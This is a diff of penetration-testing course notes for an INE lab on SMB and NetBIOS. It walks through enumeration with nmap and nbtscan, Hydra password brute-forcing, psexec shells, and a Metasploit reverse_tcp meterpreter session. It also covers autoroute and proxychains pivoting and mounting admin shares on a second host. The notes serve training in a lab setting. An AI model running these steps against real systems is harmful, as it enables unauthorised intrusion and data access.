noelenz/eJPT-Course-Notes/Host & Network Penetration Testing /Network-Based Attacks /Network-Based Attacks.md

 - Modern implementations of Windows primarily use SMB and can work without NetBIOS, however, NetBIOS over TCP 139 is required for backward compatibility and are often enabled together

+# SMB & NetBIOS Enumeration and Exploitation

+## Objective

+The objective of this exercise is to enumerate and exploit the SMB services on two target systems.
+Using tools such as `Nmap`, `Hydra`, `Metasploit`, and `Proxychains`, you will learn to identify and exploit vulnerabilities in SMB services.
+Additionally, the lab demonstrates pivoting techniques and how to mount shared drives in the target network.

+## Lab Environment

+In this lab, you will access a Kali GUI instance.
+Two vulnerable SMB services are accessible via Kali tools at `http://demo.ine.local` and `http://demo1.ine.local`.

+### Goal:
+Exploit both targets and find the flag!

+## Tools

+The best tools for this lab are:

+- `Metasploit Framework`
+- `Nmap`
+- `Hydra`
+- `Proxychains`

+## SMB / NetBIOS Enumeration

+### What is NetBIOS?
+NetBIOS is an API and a set of network protocols that provide communication services over a local network.

+### Functions:
+- **Name Service (NetBIOS-NS):** Allows computers to register, unregister, and resolve names in a local network.
+- **Datagram Service (NetBIOS-DGM):** Supports connectionless communication and broadcasting.
+- **Session Service (NetBIOS-SSN):** Supports connection-oriented communication for more reliable data transfers.

+### Ports:
+NetBIOS typically uses ports 137 (Name Service), 138 (Datagram Service), and 139 (Session Service) over UDP and TCP.

+### What is SMB?
+SMB is a file-sharing protocol.

+### Functions:
+SMB provides features for file and printer sharing, named pipes, and inter-process communication (IPC).
+It allows users to access files on remote computers as if they were local.

+### Versions:
+- **SMB 1.0:** The original version with known security vulnerabilities, used with older operating systems like Windows XP.
+- **SMB 2.0/2.1:** Introduced with Windows Vista/Windows Server 2008, offering improved performance and security.
+- **SMB 3.0+:** Introduced with Windows 8/Windows Server 2012, adding features like encryption, multichannel support, and improvements for virtualization.

+### Ports:
+SMB generally uses port 445 for direct SMB traffic (bypassing NetBIOS) and port 139 when operating with NetBIOS.

+## SMB & NetBIOS Enumeration

+While NetBIOS and SMB were once closely linked, modern networks primarily rely on SMB for file and printer sharing, often using DNS and other mechanisms for name resolution instead of NetBIOS.
+Modern implementations of Windows mainly use SMB and can work without NetBIOS; however, NetBIOS over TCP 139 is often enabled for backward compatibility.

-## Demo:
+### Demo:

+1. **Display the Hosts File:**

    `cat /etc/hosts`

-We can ping the first machine, but not the 2nd, because we need to pivot that machine.
+   *Displays the hosts file to see which names and IP addresses are configured on the system.*

+2. **Test Connectivity:**

+   `ping demo.ine.local`

+   *Ping command to test the reachability of the first target.*

+3. **Network Scan:**

    `nmap demo.ine.local`

-We can see the netbios port, so we do netbios enumeration
+   *Scan the target machine to identify open ports and services.*

+4. **NetBIOS Enumeration:**

    `nbtscan`
    `whatis nbtscan`
    `nbtscan 10.2.21.216/24`

-We get the netBIOS names

-`nmblookup -A `

-`cat /etc/hosts/`
+   *Use `nbtscan` to identify NetBIOS names in the network.*

+5. **Resolve NetBIOS Name:**

-`nmblookup -A [demo.ine.local]`
+   `nmblookup -A demo.ine.local`

+   *`nmblookup` resolves the NetBIOS name and returns information about the target machine.*

+6. **NetBIOS Port Scan:**

-`nmap -sU -p 137 [demo.ine.local]`
+   `nmap -sU -p 137 demo.ine.local`

-`nma -sU -sV -t4 --script nbstat.nse -p137 -Pn -n [demo.ine.local]`

-We perform SMB enumeration:
+   *Scan the NetBIOS port to determine if the service is running.*

+7. **SMB Enumeration:**

    `nmap -sV -p 139,445 demo.ine.local`

-we utilize the nmap scripting engine to identify the smb protocol supported on this windows system.
-So we enumerate the versions of smb:

-this are the options we have available:

-`ls -al /usr/share/nmap/scripts/ | grep -e "smb-*"`
+   *Scan the SMB ports (139, 445) to find out which SMB versions are supported on the system.*

+8. **Identify SMB Versions:**

-`nmap -p445 --script smb-protocols demo.ine.local`
+   `nmap -p 445 --script smb-protocols demo.ine.local`

-We see that the smb port is open, but we have ntlm (smb v1) and other verisons.
-So we identified what versions of smb is supported.
-So we take advantage of SMB v1. but before we do that, we want to identify the security level of smb:
+   *Identify the SMB versions supported on the target system.*

+9. **Check SMB Security Mode:**

-`nmap -p45 --script smb-security-mode demo.ine.local`
+   `nmap -p 445 --script smb-security-mode demo.ine.local`

-we test for specific vulnerability types for smbv1:
+   *Check the security mode of SMB to identify potential vulnerabilities.*

+10. **Use SMB Client:**

     `smbclient -L demo.ine.local`

-We hit enter because we try anonymous login. login successfully

-We can perform username enumeration on the windows system because of the anonymous windows login:
+    *Attempt an anonymous login to the SMB service to browse shared resources.*

+11. **User Enumeration:**

-`nmap -p445 --script smb-enum-users.nse [target IP]`
+    `nmap -p 445 --script smb-enum-users.nse demo.ine.local`

-We get username, passworts etc.

-Now, we can leverage this information for brute-forcing smb
+    *Enumerate users available on the SMB service.*

+12. **Brute-Force SMB:**

     `vim users.txt`

-admin
-administrator
-root
-quit
+    *Create a `users.txt` file with usernames for brute-force attacks.*

     `hydra -L users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt demo.ine.local smb`

-brute force is successful.
+    *Run `Hydra` to brute-force the SMB login using a wordlist.*

+13. **Gain SMB Access:**

     `psexec.py administrator@demo.ine.local`

-login

-we get a session on the target
+    *Use `psexec` to obtain a shell on the target system.*

-we also try to get a metasploit meterpreter session:
+14. **Start a Meterpreter Session:**

     `msfconsole -q`
     `search psexec`
     `use [module]`

-evtl. set payload
+    `set payload windows/x64/meterpreter/reverse_tcp`
     `set rhosts demo.ine.local`
     `set SMBuser Administrator`
     `set SMBPass password1`
     `exploit`

-we should a meterpreter session

-`set payload windows/x64/meterpreter/reverse_tcp`

-`sysinfo`

-Now we want to gain access to the second system.
-We try to ping the demo2 from our current session on target1:

-meterpreter:`shell`

-metepreter:`ping [target2]`
+    *Use Metasploit to start a Meterpreter session on the target system.*

+15. **Attack the Second System:**

+    `meterpreter:shell`
+    `meterpreter:ping demo1.ine.local`
-metepreter:`run autoroute -s [demo.ine.local/20`
+    `meterpreter:run autoroute -s demo.ine.local/20`

-metepreter:`background`

-We set up a proxy with metasploit proxy module:
+    `meterpreter:background`

+    *Use the current session to scan and exploit the second target system.*

+16. **Use Proxychains:**

     `cat /etc/proxychains4.conf`

+    *Configure Proxychains to connect to the second target system via the first target.*

-metasploit psexec: `search socks`
+    `metasploit psexec: search socks`
     `use 0`
     `show options`
     `set version 4a`

-`set SRVPORT 9050`: because thats configured
+    `set SRVPORT 9050`
     `exploit`

-on target0, we check `netstat -antp`

-`proxychains nmap demo1.ine.local -T -Pn -sV -p 445`
+    `proxychains nmap demo1.ine.local -T4 -Pn -sV -p 445`

-On the initial session, demo.ine.local, we check if we can interact with demo1.ine.local

-`shell`

-`net view [demo1]`

-`background`

-meterpeter: `migrate -N explorer.exe`

-`shell`

-`net view demo1`
+    *Use `Proxychains` to access and scan the second target through the first.*

+17. **Mount Shared Drives:**

     `net use D: \\[Demo1]\Documents`
     `net use K: \\[Demo1]\K$`

-`dir`

     `dir K:\`

-We were mapping the share drive into our demo, that allows us the content of the shares
+    *Mount shared drives from the second target system onto the first to access files.*